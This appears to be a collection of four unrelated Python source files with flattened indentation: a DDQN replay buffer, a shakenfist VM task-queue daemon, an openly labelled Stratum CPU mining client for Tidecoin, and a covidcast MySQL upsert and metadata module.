A class for holding the experiences collected from seq2seq model
"""
def __init__(self, state, action, state_prime, action_prime, reward, q_value, done):
"""
Args:
state: current decoder output state
action: the greedy action selected from current decoder output
state_prime: next decoder output state
reward: reward of the greedy action selected
q_value: Q-value of the greedy action selected
done: whether we reached End-Of-Sequence or not
"""
self.state = state # size: dqn_input_feature_len
self.action = action # size: 1
self.state_prime = state_prime # size: dqn_input_feature_len
self.action_prime = action_prime
self.reward = reward # size: vocab_size
self.q_value = q_value # size: vocab_size
self.done = done # true/false
    def __cmp__(self, item):
        """ PriorityQueue uses this function to sort the rewards
Args:
We sort the queue such that items with higher rewards are in the head of max-heap
"""
return cmp(item.reward, self.reward) # bigger numbers have more priority
class ReplayBatch(object):
""" A class for creating batches required for training DDQN. """
def __init__(self, hps, example_list, dqn_batch_size, use_state_prime = False, max_art_oovs = 0):
"""
Args:
hps: seq2seq model parameters
example_list: list of experiences
dqn_batch_size: DDQN batch size
use_state_prime: whether to use the next decoder state to make the batch or the current one
max_art_oovs: number of OOV tokens in current batch
Properties:
_x: The input to DDQN model for training, this is basically the decoder output (dqn_batch_size, dqn_input_feature_len)
_y: The Q-estimation (dqn_batch_size, vocab_size)
_y_extended: The Q-estimation (dqn_batch_size, vocab_size + max_art_oovs)
"""
self._x = np.zeros((dqn_batch_size, hps.dqn_input_feature_len))
self._y = np.zeros((dqn_batch_size, hps.vocab_size))
self._y_extended = np.zeros((dqn_batch_size, hps.vocab_size + max_art_oovs))
for i,e in enumerate(example_list):
if use_state_prime:
self._x[i,:]=e.state_prime
else:
self._x[i,:]=e.state
self._y[i,:]=normalize([e.q_value[0:hps.vocab_size]], axis=1, norm='l1')
if max_art_oovs == 0:
self._y_extended[i,:] = normalize([e.q_value[0:hps.vocab_size]], axis=1, norm='l1')
else:
self._y_extended[i,:] = e.q_value
class ReplayBuffer(object):
""" A class for implementing the priority experience buffer. """
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, hps):
self._hps = hps
self._buffer = CustomQueue(self._hps.dqn_replay_buffer_size)
self._batch_queue = queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = queue.Queue(self.BATCH_QUEUE_MAX * self._hps.dqn_batch_size)
self._num_example_q_threads = 1 # num threads to fill example queue
self._num_batch_q_threads = 1 # num threads to fill batch queue
self._bucketing_cache_size = 100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
"""Return a Batch from the batch queue.
If mode='decode' then each batch contains a single example repeated beam_size-many times; this is necessary for beam search.
Returns:
batch: a Batch object, or None if we're in single_pass mode and we've exhausted the dataset.
"""
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
return None
batch = self._batch_queue.get() # get the next Batch
return batch
@staticmethod
def create_batch(_hps, batch, batch_size, use_state_prime=False, max_art_oovs=0):
""" Create a DDQN-compatible batch from the input transitions
Args:
_hps: seq2seq model parameters
batch: a list of Transitions
dqn_batch_size: DDQN batch size
use_state_prime: whether to use the next decoder state to make the batch or the current one
max_art_oovs: number of OOV tokens in current batch
Returns:
An object of ReplayBatch class
"""
return ReplayBatch(_hps, batch, batch_size, use_state_prime, max_art_oovs)
def fill_example_queue(self):
"""Reads data from file and processes into Examples which are then placed into the example queue."""
while True:
try:
                input_gen = next(self._example_generator())
except StopIteration: # if there are no more examples:
tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
raise Exception("single_pass mode is off but the example generator is out of data; error.")
self._example_queue.put(input_gen) # place the pair in the example queue.
def fill_batch_queue(self):
"""Takes Examples out of example queue, sorts them by encoder sequence length, processes into Batches and places them in the batch queue."""
while True:
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self._hps.dqn_batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
# feed back all the samples to the buffer
self.add(inputs)
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self._hps.dqn_batch_size):
batches.append(inputs[i:i + self._hps.dqn_batch_size])
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(ReplayBatch(self._hps, b, self._hps.dqn_batch_size))
def watch_threads(self):
"""Watch example queue and batch queue threads and restart if dead."""
while True:
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def add(self, items):
""" Adding a list of experiences to the buffer. When buffer is full,
we get rid of half of the least important experiences and keep the rest.
Args:
items: A list of experiences of size (batch_size, k, max_dec_steps, hidden_dim)
"""
for item in items:
if not self._buffer.isfull():
self._buffer.put_nowait(item)
else:
print('Replay Buffer is full, getting rid of unimportant transitions...')
self._buffer.clear()
self._buffer.put_nowait(item)
print('ReplayBatch size: {}'.format(self._buffer.qsize()))
print('ReplayBatch example queue size: {}'.format(self._example_queue.qsize()))
print('ReplayBatch batch queue size: {}'.format(self._batch_queue.qsize()))
def _buffer_len(self):
return self._buffer.qsize()
def _example_generator(self):
while True:
if not self._buffer.isempty():
item = self._buffer.get_nowait()
self._buffer.task_done()
yield item
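# Illustrative usage sketch (not part of the original module; the class name
# ReplayBuffer is assumed, as the class statement sits above this excerpt): a
# trainer feeds transitions in with add() while the background threads assemble
# ReplayBatches that are consumed via next_batch(); train_step() is hypothetical.
#
#   buffer = ReplayBuffer(hps)
#   buffer.add(transitions)        # list of Transition objects collected during decoding
#   batch = buffer.next_batch()    # may be None while the batch queue is still filling
#   if batch is not None:
#       train_step(batch)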
|
queues.py
|
import copy
import multiprocessing
import re
import requests
import setproctitle
import time
from shakenfist.config import config
from shakenfist.daemons import daemon
from shakenfist import db
from shakenfist import exceptions
from shakenfist.images import Image
from shakenfist import logutil
from shakenfist import net
from shakenfist import scheduler
from shakenfist import util
from shakenfist import virt
from shakenfist.tasks import (QueueTask,
DeleteInstanceTask,
ErrorInstanceTask,
FetchImageTask,
InstanceTask,
PreflightInstanceTask,
StartInstanceTask,
)
LOG, _ = logutil.setup(__name__)
def handle(jobname, workitem):
log = LOG.withField('workitem', jobname)
log.info('Processing workitem')
setproctitle.setproctitle(
'%s-%s' % (daemon.process_name('queues'), jobname))
instance_uuid = None
task = None
try:
for task in workitem.get('tasks', []):
if not QueueTask.__subclasscheck__(type(task)):
raise exceptions.UnknownTaskException(
'Task was not decoded: %s' % task)
if (InstanceTask.__subclasscheck__(type(task)) or
isinstance(task, FetchImageTask)):
instance_uuid = task.instance_uuid()
if instance_uuid:
log_i = log.withInstance(instance_uuid)
else:
log_i = log
log_i.withField('task_name', task.name()).info('Starting task')
# TODO(andy) Should network events also come through here eventually?
# Then this can be generalised to record events on networks/instances
# TODO(andy) This event should be recorded when it is recorded as
# dequeued in the DB. Currently it's reporting action on the item
# and calling it 'dequeue'.
if instance_uuid:
# TODO(andy) move to QueueTask
db.add_event('instance', instance_uuid, task.pretty_task_name(),
'dequeued', None, 'Work item %s' % jobname)
if isinstance(task, FetchImageTask):
image_fetch(task.url(), instance_uuid)
elif isinstance(task, PreflightInstanceTask):
redirect_to = instance_preflight(instance_uuid, task.network())
if redirect_to:
log_i.info('Redirecting instance start to %s'
% redirect_to)
db.place_instance(instance_uuid, redirect_to)
db.enqueue(redirect_to, workitem)
return
elif isinstance(task, StartInstanceTask):
instance_start(instance_uuid, task.network())
db.update_instance_state(instance_uuid, 'created')
db.enqueue('%s-metrics' % config.NODE_NAME, {})
elif isinstance(task, DeleteInstanceTask):
try:
instance_delete(instance_uuid)
db.update_instance_state(instance_uuid, 'deleted')
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
elif isinstance(task, ErrorInstanceTask):
try:
instance_delete(instance_uuid)
db.update_instance_state(instance_uuid, 'error')
if task.error_msg():
db.update_instance_error_message(
instance_uuid, task.error_msg())
db.enqueue('%s-metrics' % config.NODE_NAME, {})
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
else:
log_i.withField('task', task).error('Unhandled task - dropped')
log_i.info('Task complete')
except exceptions.ImageFetchTaskFailedException as e:
# Usually caused by an external issue and not an application error
log.info('Fetch Image Error: %s', e)
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'failed queue task: %s' % e)
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'failed queue task: %s' % e)
finally:
db.resolve(config.NODE_NAME, jobname)
if instance_uuid:
db.add_event('instance', instance_uuid, 'tasks complete',
'dequeued', None, 'Work item %s' % jobname)
log.info('Completed workitem')
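# Sketch of the work item shape handle() expects, inferred from the loop above (the
# task constructor arguments shown here are assumptions, not taken from shakenfist docs):
#
#   workitem = {
#       'tasks': [
#           PreflightInstanceTask(instance_uuid, network),
#           StartInstanceTask(instance_uuid, network),
#       ]
#   }
#   handle('example-job', workitem)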
def image_fetch(url, instance_uuid):
instance = None
if instance_uuid:
instance = virt.from_db(instance_uuid)
try:
# TODO(andy): Wait up to 15 mins for another queue process to download
# the required image. This will be changed to queue on a
# "waiting_image_fetch" queue but this works now.
with db.get_lock('image', config.NODE_NAME, Image.calc_unique_ref(url),
timeout=15*60, op='Image fetch') as lock:
img = Image.from_url(url)
img.get([lock], instance)
db.add_event('image', url, 'fetch', None, None, 'success')
except (exceptions.HTTPError, requests.exceptions.RequestException) as e:
LOG.withField('image', url).info('Failed to fetch image')
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'Image fetch failed: %s' % e)
# Clean common problems to store in events
msg = str(e)
re_conn_err = re.compile(r'.*NewConnectionError\(\'\<.*\>: (.*)\'')
m = re_conn_err.match(msg)
if m:
msg = m.group(1)
db.add_event('image', url, 'fetch', None, None, 'Error: '+msg)
raise exceptions.ImageFetchTaskFailedException(
'Failed to fetch image %s' % url)
def instance_preflight(instance_uuid, network):
db.update_instance_state(instance_uuid, 'preflight')
s = scheduler.Scheduler()
instance = virt.from_db(instance_uuid)
try:
s.place_instance(instance, network, candidates=[config.NODE_NAME])
return None
except exceptions.LowResourceException as e:
db.add_event('instance', instance_uuid,
'schedule', 'retry', None,
'insufficient resources: ' + str(e))
if instance.db_entry.get('placement_attempts') > 3:
raise exceptions.AbortInstanceStartException(
'Too many start attempts')
try:
if instance.db_entry.get('requested_placement'):
candidates = [instance.db_entry.get('requested_placement')]
else:
candidates = []
for node in s.metrics.keys():
if node != config.NODE_NAME:
candidates.append(node)
candidates = s.place_instance(instance, network,
candidates=candidates)
return candidates[0]
except exceptions.LowResourceException as e:
db.add_event('instance', instance_uuid,
'schedule', 'failed', None,
'insufficient resources: ' + str(e))
# This raise implies delete above
raise exceptions.AbortInstanceStartException(
'Unable to find suitable node')
def instance_start(instance_uuid, network):
log = LOG.withField('instance', instance_uuid)
with db.get_lock(
'instance', None, instance_uuid, ttl=900, timeout=120,
op='Instance start') as lock:
instance = virt.from_db(instance_uuid)
# Collect the networks
nets = {}
for netdesc in network:
if netdesc['network_uuid'] not in nets:
n = net.from_db(netdesc['network_uuid'])
if not n:
db.enqueue_instance_error(instance_uuid, 'missing network')
return
nets[netdesc['network_uuid']] = n
# Create the networks
with util.RecordedOperation('ensure networks exist', instance):
for network_uuid in nets:
n = nets[network_uuid]
try:
n.create()
n.ensure_mesh()
n.update_dhcp()
except exceptions.DeadNetwork as e:
log.withField('network', n).warning(
'Instance tried to use dead network')
db.enqueue_instance_error(
instance_uuid, 'tried to use dead network: %s' % e)
return
# Allocate console and VDI ports
instance.allocate_instance_ports()
# Now we can start the instance
libvirt = util.get_libvirt()
try:
with util.RecordedOperation('instance creation',
instance):
instance.create(lock=lock)
except libvirt.libvirtError as e:
code = e.get_error_code()
if code in (libvirt.VIR_ERR_CONFIG_UNSUPPORTED,
libvirt.VIR_ERR_XML_ERROR):
db.enqueue_instance_error(instance_uuid,
'instance failed to start: %s' % e)
return
for iface in db.get_instance_interfaces(instance_uuid):
db.update_network_interface_state(iface['uuid'], 'created')
def instance_delete(instance_uuid):
with db.get_lock('instance', None, instance_uuid, timeout=120,
op='Instance delete'):
db.add_event('instance', instance_uuid,
'queued', 'delete', None, None)
# Create list of networks used by instance
instance_networks = []
for iface in list(db.get_instance_interfaces(instance_uuid)):
if not iface['network_uuid'] in instance_networks:
instance_networks.append(iface['network_uuid'])
# Create list of networks used by all other instances
host_networks = []
for inst in list(db.get_instances(only_node=config.NODE_NAME)):
if not inst['uuid'] == instance_uuid:
for iface in db.get_instance_interfaces(inst['uuid']):
if not iface['network_uuid'] in host_networks:
host_networks.append(iface['network_uuid'])
instance_from_db_virt = virt.from_db(instance_uuid)
if instance_from_db_virt:
instance_from_db_virt.delete()
# Check each network used by the deleted instance
for network in instance_networks:
n = net.from_db(network)
if n:
# If network used by another instance, only update
if network in host_networks:
with util.RecordedOperation('deallocate ip address',
instance_from_db_virt):
n.update_dhcp()
else:
# Network not used by any other instance therefore delete
with util.RecordedOperation('remove network', n):
n.delete()
class Monitor(daemon.Daemon):
def run(self):
workers = []
LOG.info('Starting Queues')
libvirt = util.get_libvirt()
conn = libvirt.open(None)
present_cpus, _, _ = conn.getCPUMap()
while True:
try:
for w in copy.copy(workers):
if not w.is_alive():
w.join(1)
workers.remove(w)
if len(workers) < present_cpus / 2:
jobname, workitem = db.dequeue(config.NODE_NAME)
else:
workitem = None
if not workitem:
time.sleep(0.2)
continue
p = multiprocessing.Process(
target=handle, args=(jobname, workitem,),
name='%s-worker' % daemon.process_name('queues'))
p.start()
workers.append(p)
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
|
terminate_the_fuck_gpu.py
|
# A Stratum-compatible mini miner
# based on the documentation at
# https://slushpool.com/help/#!/manual/stratum-protocol
# 2017-2019 Martin Nadal https://martinnadal.eu
import socket
import json
import random
import traceback
import tdc_mine
import time
from multiprocessing import Process, Queue, cpu_count
from numba import cuda # Nvidia library for working with the GPU
bfh = bytes.fromhex
def hash_decode(x: str) -> bytes:
return bfh(x)[::-1]
def target_to_bits(target: int) -> int:
c = ("%066x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int.from_bytes(bfh(c[:6]), byteorder='big')
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
def bits_to_target(bits: int) -> int:
bitsN = (bits >> 24) & 0xff
if not (0x03 <= bitsN <= 0x20):
raise Exception("First part of bits should be in [0x03, 0x1d]")
bitsBase = bits & 0xffffff
if not (0x8000 <= bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN - 3))
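# Worked example (sketch) for the compact "bits" encoding implemented above, using the
# well-known value 0x1d00ffff: the low three bytes are the mantissa (0x00ffff) and the
# high byte is the exponent (0x1d), so
#   bits_to_target(0x1d00ffff) == 0xffff * 256 ** (0x1d - 3) == 0xffff << 208
# and target_to_bits() applied to that target returns 0x1d00ffff again.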
def bh2u(x: bytes) -> str:
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
"""
return x.hex()
def miner_thread(xblockheader, difficult):
nonce = random.randint(0, 2 ** 32 - 1) # job.get('nonce')
nonce_and_hash = tdc_mine.miner_thread(xblockheader, difficult, nonce)
return nonce_and_hash
def worker(xblockheader, payload1, payload2, bdiff, sock, number):
while 1:
# started = time.time()
z = miner_thread(xblockheader, bdiff)
# print(f'{number} thread yay!!! Time:', time.time() - started, 'Diff', difficult)
print(payload1 + z[:8] + payload2)
sock.sendall(payload1 + z[:8] + payload2)
def miner(address, host, port, cpu_count=cpu_count(), password='password'):
print("address:{}".format(address))
print("host:{} port:{}".format(host, port))
print("Count threads: {}".format(cpu_count))
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
print("Socket connected")
sock.sendall(b'{"id": 1, "method": "mining.subscribe", "params": ["pytideminer-1.0.0"]}\n')
lines = sock.recv(1024).decode().split('\n')
response = json.loads(lines[0])
sub_details, extranonce1, extranonce2_size = response['result']
print(response)
extranonce2 = '00' * extranonce2_size
sock.sendall(b'{"params": ["' + address.encode() + b'", "' + password.encode() + b'"], "id": 2, "method": "mining.authorize"}\n')
print("Mining authorize")
procs = []
count = cpu_count
print("start mining")
new_time = time.time()
count_shares = 0
global_count_share = 0
global_count_success_share = 0
difficult = 0.5
# initialise these here so a mining.notify message can be handled even if it
# arrives before the first mining.set_difficulty message
old_diff = difficult
bdiff = bytes(str(difficult), "UTF-8")
while True:
response = sock.recv(2024).decode()
responses = [json.loads(res) for res in response.split('\n') if len(res.strip()) > 0]
for response in responses:
if response['id'] == 4 and not response['error']:
count_shares += 1
global_count_share += 1
global_count_success_share += 1
print(f"accepted: {global_count_success_share}/{global_count_share} ({round(global_count_success_share/global_count_share*100)}%) (yay!!!)")
elif response['id'] == 4 and response['error']:
global_count_share += 1
print("boooo", response['error'])
elif response['id'] == 2 and not response['error']:
print("Authorize successful!!!")
elif response['id'] == 2 and response['error']:
print("Authorize error!!!", response['error'])
# get rid of empty lines
elif response['method'] == 'mining.set_difficulty':
old_diff = difficult
difficult = response['params'][0]
bdiff = bytes(str(difficult), "UTF-8")
print("New stratum difficulty: ", difficult)
elif response['method'] == 'mining.notify':
job_id, prevhash, coinb1, coinb2, merkle_branch, \
version, nbits, ntime, clean_jobs = response['params']
d = ''
for h in merkle_branch:
d += h
merkleroot_1 = tdc_mine.sha256d_str(coinb1.encode('utf8'), extranonce1.encode('utf8'),
extranonce2.encode('utf8'), coinb2.encode('utf8'), d.encode('utf8'))
xblockheader0 = version + prevhash + merkleroot_1.decode('utf8') + ntime + nbits
print("Mining notify")
for proc in procs:
proc.terminate()
procs = []
old_time = new_time
new_time = time.time()
xnonce = "00000000"
xblockheader = (xblockheader0 + xnonce).encode('utf8')
payload1 = bytes(
'{"params": ["' + "address" + '", "' + job_id + '", "' + extranonce2 + '", "' + ntime + '", "',
"UTF-8")
payload2 = bytes('"], "id": 4, "method": "mining.submit"}\n', "UTF-8")
for number in range(count):
proc = Process(target=worker, args=(xblockheader, payload1, payload2, bdiff, sock, number + 1))
proc.daemon = True
procs.append(proc)
proc.start()
if count_shares:
hashrate = count_shares * (old_diff / 65536) * 2 ** 32 / (new_time-old_time)
print(f"Found {count_shares} shares in {round(new_time-old_time)} seconds at diff", old_diff)
print(f"Current Hashrate:", round(hashrate), "H/s")
print(f"Recommended diff:", round((count_shares*10/(new_time-old_time))*old_diff, 2))
old_diff = difficult
count_shares = 0
except KeyboardInterrupt:
for proc in procs:
proc.terminate()
sock.close()
except:
print(traceback.format_exc())
try:
for proc in procs:
proc.terminate()
except:
pass
try:
sock.close()
except:
pass
print("Connection refused, restart after 30 s")
time.sleep(30)
miner(address, host, port, cpu_count, password)
if __name__ == "__main__":
import argparse
import sys
# Parse the command line
parser = argparse.ArgumentParser(description="PyMiner is a Stratum CPU mining client. "
"If you like this piece of software, please "
"consider supporting its future development via "
"donating to one of the addresses indicated in the "
"README.md file")
parser.add_argument('-o', '--url', default="pool.tidecoin.exchange:3032", help='mining server url (eg: pool.tidecoin.exchange:3033)')
parser.add_argument('-u', '--user', dest='username', default='TSrAZcfyx8EZdzaLjV5ketPwtowgw3WUYw.default', help='username for mining server',
metavar="USERNAME")
parser.add_argument('-t', '--threads', dest='threads', default=cpu_count(), help='number of threads',
metavar="THREADS")
parser.add_argument('-p', '--password', dest='password', default='password', help='password',
metavar="PASSWORD")
options = parser.parse_args(sys.argv[1:])
miner(options.username, options.url.split(":")[0], int(options.url.split(":")[1]), int(options.threads), options.password)
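# Example invocation (sketch; flags as defined by the argparse options above):
#   python terminate_the_fuck_gpu.py -o pool.tidecoin.exchange:3032 -u USERNAME.WORKER -t 4 -p PASSWORD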
|
database.py
|
"""A utility class that handles database operations related to covidcast.
See src/ddl/covidcast.sql for an explanation of each field.
"""
# third party
import json
import mysql.connector
import numpy as np
from math import ceil
from queue import Queue, Empty
import threading
from multiprocessing import cpu_count
# first party
import delphi.operations.secrets as secrets
class CovidcastRow():
"""A container for all the values of a single covidcast row."""
@staticmethod
def fromCsvRowValue(row_value, source, signal, time_type, geo_type, time_value, issue, lag, is_wip):
if row_value is None: return None
return CovidcastRow(source, signal, time_type, geo_type, time_value,
row_value.geo_value,
row_value.value,
row_value.stderr,
row_value.sample_size,
issue, lag, is_wip)
@staticmethod
def fromCsvRows(row_values, source, signal, time_type, geo_type, time_value, issue, lag, is_wip):
# NOTE: returns a generator, as row_values is expected to be a generator
return (CovidcastRow.fromCsvRowValue(row_value, source, signal, time_type, geo_type, time_value, issue, lag, is_wip)
for row_value in row_values)
def __init__(self, source, signal, time_type, geo_type, time_value, geo_value, value, stderr, sample_size, issue, lag, is_wip):
self.id = None
self.source = source
self.signal = signal
self.time_type = time_type
self.geo_type = geo_type
self.time_value = time_value
self.geo_value = geo_value # from CSV row
self.value = value # ...
self.stderr = stderr # ...
self.sample_size = sample_size # from CSV row
self.direction_updated_timestamp = 0
self.direction = None
self.issue = issue
self.lag = lag
self.is_wip = is_wip
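# Construction sketch for CovidcastRow (argument order as in __init__ above; the
# values are illustrative only):
#   row = CovidcastRow('src', 'sig', 'day', 'county', 20200401, '01001',
#                      1.5, 0.2, 100, 20200406, 5, False)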
class Database:
"""A collection of covidcast database operations."""
DATABASE_NAME = 'epidata'
def connect(self, connector_impl=mysql.connector):
"""Establish a connection to the database."""
u, p = secrets.db.epi
self._connector_impl = connector_impl
self._connection = self._connector_impl.connect(
host=secrets.db.host,
user=u,
password=p,
database=Database.DATABASE_NAME)
self._cursor = self._connection.cursor()
def commit(self):
self._connection.commit()
def rollback(self):
self._connection.rollback()
def disconnect(self, commit):
"""Close the database connection.
commit: if true, commit changes, otherwise rollback
"""
self._cursor.close()
if commit:
self._connection.commit()
self._connection.close()
def count_all_rows(self):
"""Return the total number of rows in table `covidcast`."""
self._cursor.execute('SELECT count(1) FROM `covidcast`')
for (num,) in self._cursor:
return num
def insert_or_update_bulk(self, cc_rows):
return self.insert_or_update_batch(cc_rows)
def insert_or_update_batch(self, cc_rows, batch_size=2**20, commit_partial=False):
"""
Insert new rows (or update existing) in the `covidcast` table.
This has the intentional side effect of updating the primary timestamp.
"""
tmp_table_name = 'tmp_insert_update_table'
# TODO: this heavily copypastas src/ddl/covidcast.sql -- there's got to be a better way
create_tmp_table_sql = f'''
CREATE TABLE `{tmp_table_name}` (
`source` varchar(32) NOT NULL,
`signal` varchar(64) NOT NULL,
`time_type` varchar(12) NOT NULL,
`geo_type` varchar(12) NOT NULL,
`time_value` int(11) NOT NULL,
`geo_value` varchar(12) NOT NULL,
`value_updated_timestamp` int(11) NOT NULL,
`value` double NOT NULL,
`stderr` double,
`sample_size` double,
`direction_updated_timestamp` int(11) NOT NULL,
`direction` int(11),
`issue` int(11) NOT NULL,
`lag` int(11) NOT NULL,
`is_latest_issue` BINARY(1) NOT NULL,
`is_wip` BINARY(1) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
'''
truncate_tmp_table_sql = f'TRUNCATE TABLE {tmp_table_name};'
drop_tmp_table_sql = f'DROP TABLE {tmp_table_name}'
insert_into_tmp_sql = f'''
INSERT INTO `{tmp_table_name}`
(`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`,
`value_updated_timestamp`, `value`, `stderr`, `sample_size`, `direction_updated_timestamp`, `direction`,
`issue`, `lag`, `is_latest_issue`, `is_wip`)
VALUES
(%s, %s, %s, %s, %s, %s, UNIX_TIMESTAMP(NOW()), %s, %s, %s, 0, NULL, %s, %s, 0, %s)
'''
insert_or_update_sql = f'''
INSERT INTO `covidcast`
(`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`,
`value_updated_timestamp`, `value`, `stderr`, `sample_size`, `direction_updated_timestamp`, `direction`,
`issue`, `lag`, `is_latest_issue`, `is_wip`)
SELECT * FROM `{tmp_table_name}`
ON DUPLICATE KEY UPDATE
`value_updated_timestamp` = VALUES(`value_updated_timestamp`),
`value` = VALUES(`value`),
`stderr` = VALUES(`stderr`),
`sample_size` = VALUES(`sample_size`)
'''
zero_is_latest_issue_sql = f'''
UPDATE
(
SELECT DISTINCT `source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`
FROM `{tmp_table_name}`
) AS TMP
LEFT JOIN `covidcast`
USING (`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`)
SET `is_latest_issue`=0
'''
set_is_latest_issue_sql = f'''
UPDATE
(
SELECT `source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`, MAX(`issue`) AS `issue`
FROM
(
SELECT DISTINCT `source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`
FROM `{tmp_table_name}`
) AS TMP
LEFT JOIN `covidcast`
USING (`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`)
GROUP BY `source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`
) AS TMP
LEFT JOIN `covidcast`
USING (`source`, `signal`, `time_type`, `geo_type`, `time_value`, `geo_value`, `issue`)
SET `is_latest_issue`=1
'''
# TODO: consider handling cc_rows as a generator instead of a list
self._cursor.execute(create_tmp_table_sql)
try:
num_rows = len(cc_rows)
total = 0
if not batch_size:
batch_size = num_rows
num_batches = ceil(num_rows/batch_size)
for batch_num in range(num_batches):
start = batch_num * batch_size
end = min(num_rows, start + batch_size)
length = end - start
args = [(
row.source,
row.signal,
row.time_type,
row.geo_type,
row.time_value,
row.geo_value,
row.value,
row.stderr,
row.sample_size,
row.issue,
row.lag,
row.is_wip
) for row in cc_rows[start:end]]
self._cursor.executemany(insert_into_tmp_sql, args)
self._cursor.execute(insert_or_update_sql)
modified_row_count = self._cursor.rowcount
self._cursor.execute(zero_is_latest_issue_sql)
self._cursor.execute(set_is_latest_issue_sql)
self._cursor.execute(truncate_tmp_table_sql)
if modified_row_count is None or modified_row_count == -1:
# the SQL connector does not support returning number of rows affected (see PEP 249)
total = None
else:
total += modified_row_count
if commit_partial:
self._connection.commit()
except Exception as e:
raise e
finally:
self._cursor.execute(drop_tmp_table_sql)
return total
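# Usage sketch for the batched upsert above (method names are those defined in this
# class; the commit policy shown is illustrative):
#   db = Database()
#   db.connect()
#   db.insert_or_update_batch(rows, batch_size=2**20, commit_partial=False)
#   db.disconnect(commit=True)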
def get_covidcast_meta(self):
"""Compute and return metadata on all non-WIP COVIDcast signals."""
n_threads = max(1, cpu_count()*9//10) # aka number of concurrent db connections, which [sh|c]ould be ~<= 90% of the #cores available to SQL server
# NOTE: this may present a small problem if this job runs on different hardware than the db,
# but we should not run into that issue in prod.
srcsigs = Queue() # multi-consumer threadsafe!
sql = 'SELECT `source`, `signal` FROM `covidcast` GROUP BY `source`, `signal` ORDER BY `source` ASC, `signal` ASC;'
self._cursor.execute(sql)
for source, signal in list(self._cursor): # self._cursor is a generator; this lets us use the cursor for subsequent queries inside the loop
sql = "SELECT `is_wip` FROM `covidcast` WHERE `source`=%s AND `signal`=%s LIMIT 1"
self._cursor.execute(sql, (source, signal))
is_wip = int(self._cursor.fetchone()[0]) # casting to int as it comes out as a '0' or '1' bytearray; bool('0')==True :(
if not is_wip:
srcsigs.put((source, signal))
inner_sql = '''
SELECT
t.`source` AS `data_source`,
t.`signal`,
t.`time_type`,
t.`geo_type`,
MIN(t.`time_value`) AS `min_time`,
MAX(t.`time_value`) AS `max_time`,
COUNT(DISTINCT t.`geo_value`) AS `num_locations`,
MIN(`value`) AS `min_value`,
MAX(`value`) AS `max_value`,
ROUND(AVG(`value`),7) AS `mean_value`,
ROUND(STD(`value`),7) AS `stdev_value`,
MAX(`value_updated_timestamp`) AS `last_update`,
MAX(`issue`) as `max_issue`,
MIN(`lag`) as `min_lag`,
MAX(`lag`) as `max_lag`
FROM
`covidcast` t
WHERE
`source` = %s AND
`signal` = %s AND
is_latest_issue = 1
GROUP BY
t.`time_type`,
t.`geo_type`
ORDER BY
t.`time_type` ASC,
t.`geo_type` ASC
'''
meta = []
meta_lock = threading.Lock()
def worker():
print("starting thread: " + threading.current_thread().name)
# set up new db connection for thread
worker_dbc = Database()
worker_dbc.connect(connector_impl=self._connector_impl)
w_cursor = worker_dbc._cursor
try:
while True:
(source, signal) = srcsigs.get_nowait() # this will throw the Empty caught below
w_cursor.execute(inner_sql, (source, signal))
with meta_lock:
meta.extend(list(
dict(zip(w_cursor.column_names, x)) for x in w_cursor
))
srcsigs.task_done()
except Empty:
print("no jobs left, thread terminating: " + threading.current_thread().name)
finally:
worker_dbc.disconnect(False) # cleanup
threads = []
for n in range(n_threads):
t = threading.Thread(target=worker, name='MetacacheThread-'+str(n))
t.start()
threads.append(t)
srcsigs.join()
print("jobs complete")
for t in threads:
t.join()
print("threads terminated")
